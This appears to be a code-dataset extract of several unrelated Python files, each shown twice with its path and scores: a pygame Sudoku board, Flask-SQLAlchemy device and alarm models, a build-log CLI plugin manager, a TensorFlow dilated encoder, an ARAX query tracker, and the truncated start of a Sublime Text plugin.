self.Image = pygame.transform.scale(self.Image, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
tileImage = pygame.image.load("pics/num0.png")
tileImage = pygame.transform.scale(tileImage, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
if self.isOrig:
tileImage.set_alpha(150)
pass
cst.screen.blit(tileImage, (self.x + 2, self.y + 2))
cst.screen.blit(self.Image, (self.x + 2, self.y + 2))
class Board:
def __init__(self):
self.grid = [
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()] ]
self.basicBoard = sudGen.getSudoku()
self.setGrid()
def change(self, loc, newNum):
if(SudokuSolve.valid(self.basicBoard, loc, newNum) or newNum == 0):
self.basicBoard[loc[0]][loc[1]] = newNum
self.grid[loc[0]][loc[1]].switch(newNum)
else:
return False
pass
def setGrid(self):
# nb = sudokuGen2.make()
nb = self.basicBoard
for row in range(len(nb)):
for col in range(len(nb)):
if nb[row][col] != 0: # random.randrange(2, 5) != 4 and
self.grid[row][col] = Tile(nb[row][col], True)
self.grid[row][col].updatePos(row, col)
def display(self):
for tiles in self.grid:
for tile in tiles:
tile.display() | sudoku/classes.py | import pygame
from sudoku import constants as cst
from sudoku.Generators import sudGen
from sudoku.solvers import SudokuSolve
class Tile:
def __init__(self, num=0, isOrig=False):
self.img = "pics/num" + str(num) + ".png"
self.x = 0
self.y = 0
self.val = num
self.isOrig = isOrig
self.Image = pygame.image.load(self.img)
def updatePos(self, row, col):
self.y = cst.GRID_LEFT_OFFSET + row * (cst.TILE_WIDTH + cst.TILE_X_SPACER)
self.x = cst.GRID_TOP_OFFSET + col * (cst.TILE_HEIGHT + cst.TILE_Y_SPACER)
def switch(self, newNum: int):
self.img = "pics/num" + str(newNum) + ".png"
self.val = newNum
self.updateImage()
def updateImage(self):
self.Image = pygame.image.load(self.img)
def display(self):
self.Image = pygame.transform.scale(self.Image, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
tileImage = pygame.image.load("pics/num0.png")
tileImage = pygame.transform.scale(tileImage, (cst.TILE_WIDTH - 4, cst.TILE_HEIGHT - 4))
if self.isOrig:
tileImage.set_alpha(150)
pass
cst.screen.blit(tileImage, (self.x + 2, self.y + 2))
cst.screen.blit(self.Image, (self.x + 2, self.y + 2))
class Board:
def __init__(self):
self.grid = [
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()],
[Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile(), Tile()] ]
self.basicBoard = sudGen.getSudoku()
self.setGrid()
def change(self, loc, newNum):
if(SudokuSolve.valid(self.basicBoard, loc, newNum) or newNum == 0):
self.basicBoard[loc[0]][loc[1]] = newNum
self.grid[loc[0]][loc[1]].switch(newNum)
else:
return False
pass
def setGrid(self):
# nb = sudokuGen2.make()
nb = self.basicBoard
for row in range(len(nb)):
for col in range(len(nb)):
if nb[row][col] != 0: # random.randrange(2, 5) != 4 and
self.grid[row][col] = Tile(nb[row][col], True)
self.grid[row][col].updatePos(row, col)
def display(self):
for tiles in self.grid:
for tile in tiles:
tile.display() | 0.24608 | 0.216446 |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/keli'
db = SQLAlchemy(app)
class Device(db.Model):
__tablename__ = 'device'
gprsSn = db.Column(db.String(20), primary_key=True)
company = db.Column(db.String(32), unique=True)
addr = db.Column(db.String(32))
inited = db.Column(db.String(10))
stat = db.Column(db.String(10))
almCode = db.Column(db.String(10))
almAddr = db.Column(db.String(10))
t = db.Column(db.String(50))
ip = db.Column(db.String(50))
location = db.Column(db.String(50))
serviceInfo = db.Column(db.String(300))
province = db.Column(db.String(50))
city = db.Column(db.String(50))
def __repr__(self):
return "<Device %r>" % self.gprsSn
#设备详细信息
def json_details(self):
return {
'gprsSn': self.gprsSn,
'company': self.company if self.company != ""and self.company != None else"宁波柯力创安科技股份有限公司",
'inited': "在线" if self.inited=='1' else"离线",
'stat': "故障" if self.stat != '0' else "正常",
'almCode': self.almCode,
'serviceInfo': self.serviceInfo if self.serviceInfo != "" else "无"
}
class Alarm(db.Model):
__tablename__='alarm'
gprsSn = db.Column(db.String(20), primary_key=True)
almNum = db.Column(db.String(50), unique=True)
def __repr__(self):
return "<Alarm %r>" % self.gprsSn
class Alarmrecord(db.Model):
__tablename__ = 'alarmrecord'
id = db.Column(db.Integer, primary_key=True)
gprsSn = db.Column(db.String(20))
recordTime = db.Column(db.DateTime(0))
code = db.Column(db.String(10))
addr = db.Column(db.String(10))
deviceType = db.Column(db.String(20))
stat = db.Column(db.String(10))
def __repr__(self):
return "<AlarmRecord %r>" % self.gprsSn
# 故障信息
def json_alarm(self):
return {
'recordTime': self.recordTime,
'code': self.code,
'addr': self.addr,
'stat': self.stat
} | kelidata.py | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@127.0.0.1:3306/keli'
db = SQLAlchemy(app)
class Device(db.Model):
__tablename__ = 'device'
gprsSn = db.Column(db.String(20), primary_key=True)
company = db.Column(db.String(32), unique=True)
addr = db.Column(db.String(32))
inited = db.Column(db.String(10))
stat = db.Column(db.String(10))
almCode = db.Column(db.String(10))
almAddr = db.Column(db.String(10))
t = db.Column(db.String(50))
ip = db.Column(db.String(50))
location = db.Column(db.String(50))
serviceInfo = db.Column(db.String(300))
province = db.Column(db.String(50))
city = db.Column(db.String(50))
def __repr__(self):
return "<Device %r>" % self.gprsSn
#设备详细信息
def json_details(self):
return {
'gprsSn': self.gprsSn,
'company': self.company if self.company != ""and self.company != None else"宁波柯力创安科技股份有限公司",
'inited': "在线" if self.inited=='1' else"离线",
'stat': "故障" if self.stat != '0' else "正常",
'almCode': self.almCode,
'serviceInfo': self.serviceInfo if self.serviceInfo != "" else "无"
}
class Alarm(db.Model):
__tablename__='alarm'
gprsSn = db.Column(db.String(20), primary_key=True)
almNum = db.Column(db.String(50), unique=True)
def __repr__(self):
return "<Alarm %r>" % self.gprsSn
class Alarmrecord(db.Model):
__tablename__ = 'alarmrecord'
id = db.Column(db.Integer, primary_key=True)
gprsSn = db.Column(db.String(20))
recordTime = db.Column(db.DateTime(0))
code = db.Column(db.String(10))
addr = db.Column(db.String(10))
deviceType = db.Column(db.String(20))
stat = db.Column(db.String(10))
def __repr__(self):
return "<AlarmRecord %r>" % self.gprsSn
# 故障信息
def json_alarm(self):
return {
'recordTime': self.recordTime,
'code': self.code,
'addr': self.addr,
'stat': self.stat
} | 0.318697 | 0.050051 |
from instmakelib import instmake_log as LOG
from instmakelib import shellsyntax
from instmakelib import clibase
import sys
class CLIManager:
"""Manages the CLI plugins."""
def __init__(self, plugins=None):
# Load CLI plugins
if not plugins:
plugins = LOG.GetPlugins()
mods = plugins.LoadAllPlugins(LOG.CLI_PLUGIN_PREFIX)
# Containers for CLI plugins to register themselves to.
self.tool_contains = []
self.tool_regexes = []
# Key = 'name' from plugin, Value = plugin module
self.plugin_names = {}
for mod in mods:
mod.register(self)
self.plugin_names[mod.name] = mod
def PrintHelp(self):
names = self.plugin_names.keys()
names.sort()
for name in names:
mod = self.plugin_names[name]
print name, ":", mod.description
mod.usage()
def UserOption(self, user_option):
i = user_option.find(",")
if i < 1:
sys.exit("Invalid CLI plugin option: %s" % (user_option,))
plugin_name = user_option[:i]
option_text = user_option[i+1:]
options = option_text.split(",")
if not self.plugin_names.has_key(plugin_name):
sys.exit("No CLI plugin '%s'" % (plugin_name,))
mod = self.plugin_names[plugin_name]
for option in options:
mod.UserOption(option)
def _ParseCmdline(self, cmdline_string):
cmdline_args = shellsyntax.split_shell_cmdline(cmdline_string)
# XXX - We need to be able to handle "segmented" command-lines
# (using &&, ||, ;, and the redirection symbols). But we don't
# have a full-blown shell-cmdline parser. For now, we can help
# the cli plugins if we tidy things up a bit.
if cmdline_args:
# Remove any prefixed new-lines, which can come in from
# make-3.81
cmdline_args = [a.lstrip("\n") for a in cmdline_args]
# Look for a word that stars with `, like `gcc..... ...`
for i, arg in enumerate(cmdline_args):
if len(arg) > 1 and arg[0] == "`":
cmdline_args = cmdline_args[:i]
if ";" in cmdline_args:
i = cmdline_args.index(";")
cmdline_args = cmdline_args[:i]
if "||" in cmdline_args:
i = cmdline_args.index("||")
cmdline_args = cmdline_args[:i]
if "&&" in cmdline_args:
i = cmdline_args.index("&&")
cmdline_args = cmdline_args[:i]
# Trailing semicolon attached to a word
if cmdline_args[-1] == ";":
cmdline_args = cmdline_args[:-1]
# make-3.81 will put a trailing backslash ("\\n") in the cmdline,
# which shows up as \n; after the previous filter, it will now
# be an empty string, so remove that here.
cmdline_args = filter(lambda x: x != "", cmdline_args)
return cmdline_args
def ParseRecord(self, rec, cwd=None, pathfunc=None):
"""Find a Parser object that can parse the command-line in the
log record."""
cmdline_args = self._ParseCmdline(rec.cmdline)
# Check tool regexes
for (regex, cb) in self.tool_regexes:
if rec.tool != None and regex.search(rec.tool):
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Check tool substrings
for (substring, cb) in self.tool_contains:
if rec.tool != None and rec.tool.find(substring) > -1:
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Nothing matched. Return None for "no parser"
return None
# Methods a CLI plugin can call to register itself.
def RegisterToolContains(self, cb, substring):
self.tool_contains.append((substring, cb))
def RegisterToolRegex(self, cb, regex):
self.tool_regexes.append((regex, cb)) | instmakelib/climanager.py | from instmakelib import instmake_log as LOG
from instmakelib import shellsyntax
from instmakelib import clibase
import sys
class CLIManager:
"""Manages the CLI plugins."""
def __init__(self, plugins=None):
# Load CLI plugins
if not plugins:
plugins = LOG.GetPlugins()
mods = plugins.LoadAllPlugins(LOG.CLI_PLUGIN_PREFIX)
# Containers for CLI plugins to register themselves to.
self.tool_contains = []
self.tool_regexes = []
# Key = 'name' from plugin, Value = plugin module
self.plugin_names = {}
for mod in mods:
mod.register(self)
self.plugin_names[mod.name] = mod
def PrintHelp(self):
names = self.plugin_names.keys()
names.sort()
for name in names:
mod = self.plugin_names[name]
print name, ":", mod.description
mod.usage()
def UserOption(self, user_option):
i = user_option.find(",")
if i < 1:
sys.exit("Invalid CLI plugin option: %s" % (user_option,))
plugin_name = user_option[:i]
option_text = user_option[i+1:]
options = option_text.split(",")
if not self.plugin_names.has_key(plugin_name):
sys.exit("No CLI plugin '%s'" % (plugin_name,))
mod = self.plugin_names[plugin_name]
for option in options:
mod.UserOption(option)
def _ParseCmdline(self, cmdline_string):
cmdline_args = shellsyntax.split_shell_cmdline(cmdline_string)
# XXX - We need to be able to handle "segmented" command-lines
# (using &&, ||, ;, and the redirection symbols). But we don't
# have a full-blown shell-cmdline parser. For now, we can help
# the cli plugins if we tidy things up a bit.
if cmdline_args:
# Remove any prefixed new-lines, which can come in from
# make-3.81
cmdline_args = [a.lstrip("\n") for a in cmdline_args]
# Look for a word that stars with `, like `gcc..... ...`
for i, arg in enumerate(cmdline_args):
if len(arg) > 1 and arg[0] == "`":
cmdline_args = cmdline_args[:i]
if ";" in cmdline_args:
i = cmdline_args.index(";")
cmdline_args = cmdline_args[:i]
if "||" in cmdline_args:
i = cmdline_args.index("||")
cmdline_args = cmdline_args[:i]
if "&&" in cmdline_args:
i = cmdline_args.index("&&")
cmdline_args = cmdline_args[:i]
# Trailing semicolon attached to a word
if cmdline_args[-1] == ";":
cmdline_args = cmdline_args[:-1]
# make-3.81 will put a trailing backslash ("\\n") in the cmdline,
# which shows up as \n; after the previous filter, it will now
# be an empty string, so remove that here.
cmdline_args = filter(lambda x: x != "", cmdline_args)
return cmdline_args
def ParseRecord(self, rec, cwd=None, pathfunc=None):
"""Find a Parser object that can parse the command-line in the
log record."""
cmdline_args = self._ParseCmdline(rec.cmdline)
# Check tool regexes
for (regex, cb) in self.tool_regexes:
if rec.tool != None and regex.search(rec.tool):
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Check tool substrings
for (substring, cb) in self.tool_contains:
if rec.tool != None and rec.tool.find(substring) > -1:
if cwd == None:
cwd = rec.cwd
try:
retval = cb(cmdline_args, cwd, pathfunc)
return retval
except clibase.NotHandledException:
return None
except clibase.BadCLIException, err:
print >> sys.stderr, "Error in PID %s" % (rec.pid,)
print >> sys.stderr, err
rec.Print(sys.stderr)
sys.exit(1)
# Nothing matched. Return None for "no parser"
return None
# Methods a CLI plugin can call to register itself.
def RegisterToolContains(self, cb, substring):
self.tool_contains.append((substring, cb))
def RegisterToolRegex(self, cb, regex):
self.tool_regexes.append((regex, cb)) | 0.37605 | 0.07989 |
import tensorflow as tf
import numpy as np
from layers import *
from BN_layers import *
class Dilated_Block(object):
def __init__(self, prefix, is_training, filter_width, conv_in_channels, conv_out_channels, skip_channels, dilation, clust_size = None, use_skip = True):
self.use_dense = True
self.use_dropout = False
self.use_skip = use_skip
self.glu = True
self.clust_size = clust_size
self.x_filter = BN_Conv("%s_x_filter" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
if self.glu:
self.x_gate = BN_Conv("%s_x_gate" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
self.dense = BN_Conv_1x1("%s_dense" %(prefix), is_training, conv_out_channels, conv_out_channels)
if self.use_skip:
self.skip = BN_Conv_1x1("%s_skip" %(prefix), is_training, conv_out_channels, skip_channels)
def activated_on(self, x):
x_filter = self.x_filter.activated_on(x)
if self.glu:
x_gate = self.x_gate.activated_on(x)
if self.glu:
out = x_filter * tf.sigmoid(x_gate)
else:
out = tf.nn.relu(x_filter)
dense = self.dense.activated_on(out)
if self.use_skip:
skip = self.skip.activated_on(out)
else:
skip = None
return x + dense, skip
class Dilated_Encoder(object):
def __init__(self, name, is_training, batch_size, max_seq_len, channels, discrete_dims = 22, embedding_size = 32, do_embed = True, use_skip = False):
self.batch_size = batch_size
self.var_scope = name
self.max_seq_len = max_seq_len
self.is_training = is_training
self.positional_encoding = True
self.embedding_size = embedding_size
self.discrete_dims = discrete_dims
self.position_embedding_size = self.discrete_dims
self.do_embed = do_embed
self.use_skip = use_skip
self.residual_channels = channels
self.dilation_channels = channels
self.skip_channels = channels
self.filter_width = 3
self.dilations = [1, 3, 9, 27]
self.model_output_dim = self.skip_channels if self.use_skip else self.residual_channels
self.block_class = Dilated_Block
self.vars = self.create_variables()
def create_variables(self):
var = {}
with tf.variable_scope(self.var_scope):
with tf.variable_scope("wavenet_encoder"):
if self.do_embed:
initial_channels = self.embedding_size
var["seq_embed"] = Conv_1x1("seq_embed", self.discrete_dims, self.embedding_size)
else:
initial_channels = self.discrete_dims
if self.positional_encoding:
var["position_encoder"] = tf.get_variable("enc_position_encoder", [1, self.max_seq_len, self.position_embedding_size], tf.float32, tf.random_normal_initializer(0.0, 0.05))
var["position_1x1"] = Conv_1x1("pos_embed", self.position_embedding_size, initial_channels)
var["input_conv"] = BN_Conv("input_conv", self.is_training, 3, initial_channels, self.residual_channels, dilation = 1)
with tf.variable_scope("dilated_convolutions"):
var["dilated_convolutions"] = []
for (layer_index, dilation) in enumerate(self.dilations):
next_layer = self.block_class("encoding_wavenet_%i" %(layer_index), self.is_training, self.filter_width, self.residual_channels, self.dilation_channels, self.skip_channels, dilation = dilation, use_skip = self.use_skip)
var["dilated_convolutions"].append(next_layer)
return var
def run_conv(self, batch):
skip_outputs = []
if self.do_embed:
embedded_batch = self.vars["seq_embed"].activated_on(batch)
else:
embedded_batch = batch
if self.positional_encoding:
embedded_batch += self.vars["position_1x1"].activated_on(self.vars["position_encoder"])
cur_act = self.vars["input_conv"].activated_on(embedded_batch)
for layer in self.vars["dilated_convolutions"]:
cur_act, skip = layer.activated_on(cur_act)
skip_outputs.append(skip)
if self.use_skip:
return sum(skip_outputs), cur_act
else:
return None, cur_act
def activated_on(self, batch):
if self.use_skip:
net_out, _ = self.run_conv(batch)
else:
_, net_out = self.run_conv(batch)
return net_out | dilated_encoder.py | import tensorflow as tf
import numpy as np
from layers import *
from BN_layers import *
class Dilated_Block(object):
def __init__(self, prefix, is_training, filter_width, conv_in_channels, conv_out_channels, skip_channels, dilation, clust_size = None, use_skip = True):
self.use_dense = True
self.use_dropout = False
self.use_skip = use_skip
self.glu = True
self.clust_size = clust_size
self.x_filter = BN_Conv("%s_x_filter" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
if self.glu:
self.x_gate = BN_Conv("%s_x_gate" %(prefix), is_training, filter_width, conv_in_channels, conv_out_channels, dilation = dilation)
self.dense = BN_Conv_1x1("%s_dense" %(prefix), is_training, conv_out_channels, conv_out_channels)
if self.use_skip:
self.skip = BN_Conv_1x1("%s_skip" %(prefix), is_training, conv_out_channels, skip_channels)
def activated_on(self, x):
x_filter = self.x_filter.activated_on(x)
if self.glu:
x_gate = self.x_gate.activated_on(x)
if self.glu:
out = x_filter * tf.sigmoid(x_gate)
else:
out = tf.nn.relu(x_filter)
dense = self.dense.activated_on(out)
if self.use_skip:
skip = self.skip.activated_on(out)
else:
skip = None
return x + dense, skip
class Dilated_Encoder(object):
def __init__(self, name, is_training, batch_size, max_seq_len, channels, discrete_dims = 22, embedding_size = 32, do_embed = True, use_skip = False):
self.batch_size = batch_size
self.var_scope = name
self.max_seq_len = max_seq_len
self.is_training = is_training
self.positional_encoding = True
self.embedding_size = embedding_size
self.discrete_dims = discrete_dims
self.position_embedding_size = self.discrete_dims
self.do_embed = do_embed
self.use_skip = use_skip
self.residual_channels = channels
self.dilation_channels = channels
self.skip_channels = channels
self.filter_width = 3
self.dilations = [1, 3, 9, 27]
self.model_output_dim = self.skip_channels if self.use_skip else self.residual_channels
self.block_class = Dilated_Block
self.vars = self.create_variables()
def create_variables(self):
var = {}
with tf.variable_scope(self.var_scope):
with tf.variable_scope("wavenet_encoder"):
if self.do_embed:
initial_channels = self.embedding_size
var["seq_embed"] = Conv_1x1("seq_embed", self.discrete_dims, self.embedding_size)
else:
initial_channels = self.discrete_dims
if self.positional_encoding:
var["position_encoder"] = tf.get_variable("enc_position_encoder", [1, self.max_seq_len, self.position_embedding_size], tf.float32, tf.random_normal_initializer(0.0, 0.05))
var["position_1x1"] = Conv_1x1("pos_embed", self.position_embedding_size, initial_channels)
var["input_conv"] = BN_Conv("input_conv", self.is_training, 3, initial_channels, self.residual_channels, dilation = 1)
with tf.variable_scope("dilated_convolutions"):
var["dilated_convolutions"] = []
for (layer_index, dilation) in enumerate(self.dilations):
next_layer = self.block_class("encoding_wavenet_%i" %(layer_index), self.is_training, self.filter_width, self.residual_channels, self.dilation_channels, self.skip_channels, dilation = dilation, use_skip = self.use_skip)
var["dilated_convolutions"].append(next_layer)
return var
def run_conv(self, batch):
skip_outputs = []
if self.do_embed:
embedded_batch = self.vars["seq_embed"].activated_on(batch)
else:
embedded_batch = batch
if self.positional_encoding:
embedded_batch += self.vars["position_1x1"].activated_on(self.vars["position_encoder"])
cur_act = self.vars["input_conv"].activated_on(embedded_batch)
for layer in self.vars["dilated_convolutions"]:
cur_act, skip = layer.activated_on(cur_act)
skip_outputs.append(skip)
if self.use_skip:
return sum(skip_outputs), cur_act
else:
return None, cur_act
def activated_on(self, batch):
if self.use_skip:
net_out, _ = self.run_conv(batch)
else:
_, net_out = self.run_conv(batch)
return net_out | 0.705075 | 0.165627 |
import sys
import os
import time
from datetime import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Float, String, DateTime, PickleType
from sqlalchemy.orm import sessionmaker
from sqlalchemy import text
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../../")
from RTXConfiguration import RTXConfiguration
Base = declarative_base()
class ARAXQuery(Base):
__tablename__ = 'arax_query'
query_id = Column(Integer, primary_key=True)
status = Column(String(50), nullable=False)
start_datetime = Column(String(19), nullable=False) ## ISO formatted YYYY-MM-DD HH:mm:ss
end_datetime = Column(String(19), nullable=True) ## ISO formatted YYYY-MM-DD HH:mm:ss
elapsed = Column(Float, nullable=True) ## seconds
pid = Column(Integer, nullable=False)
instance_name = Column(String(50), nullable=False)
origin = Column(String(50), nullable=False)
input_query = Column(PickleType, nullable=False) ## blob object
message_id = Column(Integer, nullable=True)
message_code = Column(String(50), nullable=True)
code_description = Column(String(50), nullable=True)
remote_address = Column(String(50), nullable=False)
class ARAXQueryTracker:
def __init__(self):
self.session = ""
self.databaseName = "RTXFeedback"
self.connect()
def __del__(self):
self.disconnect()
def create_tables(self):
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
def connect(self):
rtxConfig = RTXConfiguration()
engine = create_engine("mysql+pymysql://" + rtxConfig.mysql_feedback_username + ":" + rtxConfig.mysql_feedback_password + "@" + rtxConfig.mysql_feedback_host + "/" + self.databaseName)
DBSession = sessionmaker(bind=engine)
session = DBSession()
self.session = session
self.engine = engine
if not engine.dialect.has_table(engine, 'arax_query'):
self.create_tables()
def disconnect(self):
session = self.session
engine = self.engine
session.close()
try:
engine.dispose()
except:
pass
def update_tracker_entry(self, tracker_id, attributes):
session = self.session
tracker_entries = session.query(ARAXQuery).filter(ARAXQuery.query_id==tracker_id).all()
if len(tracker_entries) > 0:
tracker_entry = tracker_entries[0]
end_datetime = datetime.now()
elapsed = end_datetime - datetime.fromisoformat(tracker_entry.start_datetime)
tracker_entry.end_datetime = end_datetime.isoformat(' ', 'seconds')
tracker_entry.elapsed = elapsed.seconds
tracker_entry.status = attributes['status']
tracker_entry.message_id = attributes['message_id']
tracker_entry.message_code = attributes['message_code']
tracker_entry.code_description = attributes['code_description']
session.commit()
def create_tracker_entry(self, attributes):
session = self.session
tracker_entry = ARAXQuery(status="started",
start_datetime=datetime.now().isoformat(' ', 'seconds'),
pid=os.getpid(),
instance_name="test",
origin=attributes['origin'],
input_query=attributes['input_query'],
remote_address=attributes['remote_address'])
session.add(tracker_entry)
session.commit()
tracker_id = tracker_entry.query_id
return tracker_id
def get_entries(self, last_N_hours=24, incomplete_only=False):
if incomplete_only:
return self.session.query(ARAXQuery).filter(
text("""status NOT LIKE '%Completed%'
AND TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
else:
return self.session.query(ARAXQuery).filter(
text("""TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
def main():
query_tracker = ARAXQueryTracker()
attributes = { 'origin': 'local_dev', 'input_query': { 'query_graph': { 'nodes': [], 'edges': [] } }, 'remote_address': 'test_address' }
tracker_id = query_tracker.create_tracker_entry(attributes)
time.sleep(2)
attributes = { 'status': 'Completed OK', 'message_id': 3187, 'message_code': 'OK', 'code_description': '32 results' }
query_tracker.update_tracker_entry(tracker_id, attributes)
entries = query_tracker.get_entries()
for entry in entries:
print(entry.__dict__)
if __name__ == "__main__":
main() | code/ARAX/ARAXQuery/ARAX_query_tracker.py |
import sys
import os
import time
from datetime import datetime
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Float, String, DateTime, PickleType
from sqlalchemy.orm import sessionmaker
from sqlalchemy import text
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../../")
from RTXConfiguration import RTXConfiguration
Base = declarative_base()
class ARAXQuery(Base):
__tablename__ = 'arax_query'
query_id = Column(Integer, primary_key=True)
status = Column(String(50), nullable=False)
start_datetime = Column(String(19), nullable=False) ## ISO formatted YYYY-MM-DD HH:mm:ss
end_datetime = Column(String(19), nullable=True) ## ISO formatted YYYY-MM-DD HH:mm:ss
elapsed = Column(Float, nullable=True) ## seconds
pid = Column(Integer, nullable=False)
instance_name = Column(String(50), nullable=False)
origin = Column(String(50), nullable=False)
input_query = Column(PickleType, nullable=False) ## blob object
message_id = Column(Integer, nullable=True)
message_code = Column(String(50), nullable=True)
code_description = Column(String(50), nullable=True)
remote_address = Column(String(50), nullable=False)
class ARAXQueryTracker:
def __init__(self):
self.session = ""
self.databaseName = "RTXFeedback"
self.connect()
def __del__(self):
self.disconnect()
def create_tables(self):
Base.metadata.drop_all(self.engine)
Base.metadata.create_all(self.engine)
def connect(self):
rtxConfig = RTXConfiguration()
engine = create_engine("mysql+pymysql://" + rtxConfig.mysql_feedback_username + ":" + rtxConfig.mysql_feedback_password + "@" + rtxConfig.mysql_feedback_host + "/" + self.databaseName)
DBSession = sessionmaker(bind=engine)
session = DBSession()
self.session = session
self.engine = engine
if not engine.dialect.has_table(engine, 'arax_query'):
self.create_tables()
def disconnect(self):
session = self.session
engine = self.engine
session.close()
try:
engine.dispose()
except:
pass
def update_tracker_entry(self, tracker_id, attributes):
session = self.session
tracker_entries = session.query(ARAXQuery).filter(ARAXQuery.query_id==tracker_id).all()
if len(tracker_entries) > 0:
tracker_entry = tracker_entries[0]
end_datetime = datetime.now()
elapsed = end_datetime - datetime.fromisoformat(tracker_entry.start_datetime)
tracker_entry.end_datetime = end_datetime.isoformat(' ', 'seconds')
tracker_entry.elapsed = elapsed.seconds
tracker_entry.status = attributes['status']
tracker_entry.message_id = attributes['message_id']
tracker_entry.message_code = attributes['message_code']
tracker_entry.code_description = attributes['code_description']
session.commit()
def create_tracker_entry(self, attributes):
session = self.session
tracker_entry = ARAXQuery(status="started",
start_datetime=datetime.now().isoformat(' ', 'seconds'),
pid=os.getpid(),
instance_name="test",
origin=attributes['origin'],
input_query=attributes['input_query'],
remote_address=attributes['remote_address'])
session.add(tracker_entry)
session.commit()
tracker_id = tracker_entry.query_id
return tracker_id
def get_entries(self, last_N_hours=24, incomplete_only=False):
if incomplete_only:
return self.session.query(ARAXQuery).filter(
text("""status NOT LIKE '%Completed%'
AND TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
else:
return self.session.query(ARAXQuery).filter(
text("""TIMESTAMPDIFF(HOUR, STR_TO_DATE(start_datetime, '%Y-%m-%d %T'), NOW()) < :n""")).params(n=last_N_hours).all()
def main():
query_tracker = ARAXQueryTracker()
attributes = { 'origin': 'local_dev', 'input_query': { 'query_graph': { 'nodes': [], 'edges': [] } }, 'remote_address': 'test_address' }
tracker_id = query_tracker.create_tracker_entry(attributes)
time.sleep(2)
attributes = { 'status': 'Completed OK', 'message_id': 3187, 'message_code': 'OK', 'code_description': '32 results' }
query_tracker.update_tracker_entry(tracker_id, attributes)
entries = query_tracker.get_entries()
for entry in entries:
print(entry.__dict__)
if __name__ == "__main__":
main() | 0.295128 | 0.094052 |
import sublime, sublime_plugin
gte_st3 = int(sublime.version()) >= 3000
if gte_st3:
from .config import *
else:
from config import *
class HiveAddContextUrlBaseCommand(sublime_plugin.TextCommand):
def run(self, edit, event=None):
conf = sublime.load_settings(CONFIG_BASE_NAME)
url = self.find_url(event)
index = self.index_in_list(url, conf)
if index == -1:
self.add_to_list(url, conf)
sublime.status_message('URL `%s` has been added to open list.' % url)
else:
self.remove_from_list(index, conf)
sublime.status_message('URL `%s` has been removed from open list.' % url)
def is_visible(self, event=None):
return self.find_url(event) is not None
def description(self, event=None):
url = self.find_url(event)
if self.index_in_list(url) == -1:
return 'Add URL to Open List'
else:
return 'Remove URL from Open List'
def index_in_list(self, url, conf=None):
if conf == None:
conf = sublime.load_settings(CONFIG_BASE_NAME)
url_list = [item[0] for item in conf.get('urls', [])]
return url_list.index(url) if url in url_list else -1
def add_to_list(self, url, conf):
url_list = conf.get('urls', [])
url_list.append([url, ''])
